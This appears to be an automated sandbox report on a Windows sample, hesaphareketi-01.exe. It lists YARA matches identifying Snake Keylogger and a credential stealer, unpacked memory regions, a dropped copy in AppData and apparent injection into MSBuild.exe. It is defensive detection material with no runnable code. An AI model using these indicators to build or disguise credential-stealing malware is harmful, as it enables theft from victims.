Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06785588	9_2_06785588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678EA0F	9_2_0678EA0F
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Code function: 10_2_02BCD63C	10_2_02BCD63C
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Code function: 10_2_0538E768	10_2_0538E768
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Code function: 10_2_05389CA8	10_2_05389CA8
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Code function: 10_2_0538E758	10_2_0538E758
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Code function: 10_2_05380007	10_2_05380007
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Code function: 10_2_05380040	10_2_05380040
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Code function: 10_2_05389C98	10_2_05389C98
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Code function: 10_2_082C1380	10_2_082C1380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_05370D60	16_2_05370D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537F8D8	16_2_0537F8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_053777A8	16_2_053777A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_05377E78	16_2_05377E78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_05373288	16_2_05373288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537C910	16_2_0537C910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537C903	16_2_0537C903
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_05370900	16_2_05370900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537CD68	16_2_0537CD68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_05370D50	16_2_05370D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537CD58	16_2_0537CD58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537D1B0	16_2_0537D1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537D1C0	16_2_0537D1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537F028	16_2_0537F028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537F018	16_2_0537F018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_05370006	16_2_05370006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537BC08	16_2_0537BC08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537F471	16_2_0537F471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537C060	16_2_0537C060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537C050	16_2_0537C050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_05370040	16_2_05370040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537C4B8	16_2_0537C4B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_053704A0	16_2_053704A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537C4A8	16_2_0537C4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_05370491	16_2_05370491
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537F480	16_2_0537F480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_053708F0	16_2_053708F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537F8C9	16_2_0537F8C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537E320	16_2_0537E320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537E310	16_2_0537E310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537AF00	16_2_0537AF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537E778	16_2_0537E778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537E768	16_2_0537E768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537B358	16_2_0537B358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537B348	16_2_0537B348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537B7B0	16_2_0537B7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537B7A0	16_2_0537B7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537BBF8	16_2_0537BBF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537EBD0	16_2_0537EBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537EBC1	16_2_0537EBC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_05377E32	16_2_05377E32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537D618	16_2_0537D618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_05376E00	16_2_05376E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537D609	16_2_0537D609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537DA70	16_2_0537DA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_05373278	16_2_05373278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537DA63	16_2_0537DA63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537DEB8	16_2_0537DEB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537AEEF	16_2_0537AEEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0537DEC8	16_2_0537DEC8

Source: hesaphareketi-01.exe, 00000000.00000000.2234522779.0000000000544000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameliRg.exe" vs hesaphareketi-01.exe
Source: hesaphareketi-01.exe, 00000000.00000002.2285058032.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs hesaphareketi-01.exe
Source: hesaphareketi-01.exe, 00000000.00000002.2290094241.000000000524D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs hesaphareketi-01.exe
Source: hesaphareketi-01.exe, 00000000.00000002.2285686680.00000000041DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi-01.exe
Source: hesaphareketi-01.exe, 00000000.00000002.2279912924.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs hesaphareketi-01.exe
Source: hesaphareketi-01.exe, 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs hesaphareketi-01.exe
Source: hesaphareketi-01.exe, 00000000.00000002.2290715875.0000000006DB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi-01.exe
Source: hesaphareketi-01.exe	Binary or memory string: OriginalFilenameliRg.exe" vs hesaphareketi-01.exe

Source: hesaphareketi-01.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: hesaphareketi-01.exe PID: 5392, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: hesaphareketi-01.exe PID: 5392, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: MSBuild.exe PID: 7200, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: MSBuild.exe PID: 7200, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: WvaGpcFVX.exe PID: 7304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: WvaGpcFVX.exe PID: 7304, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: hesaphareketi-01.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WvaGpcFVX.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, vER2EhtOHL9TLC5ieA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, vER2EhtOHL9TLC5ieA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, HYtGDKqySeG7YTRyQj.cs	Security API names: _0020.SetAccessControl
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, HYtGDKqySeG7YTRyQj.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, HYtGDKqySeG7YTRyQj.cs	Security API names: _0020.AddAccessRule
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, vER2EhtOHL9TLC5ieA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, HYtGDKqySeG7YTRyQj.cs	Security API names: _0020.SetAccessControl
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, HYtGDKqySeG7YTRyQj.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, HYtGDKqySeG7YTRyQj.cs	Security API names: _0020.AddAccessRule
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, HYtGDKqySeG7YTRyQj.cs	Security API names: _0020.SetAccessControl
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, HYtGDKqySeG7YTRyQj.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, HYtGDKqySeG7YTRyQj.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/15@3/3

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

File created: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2144:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
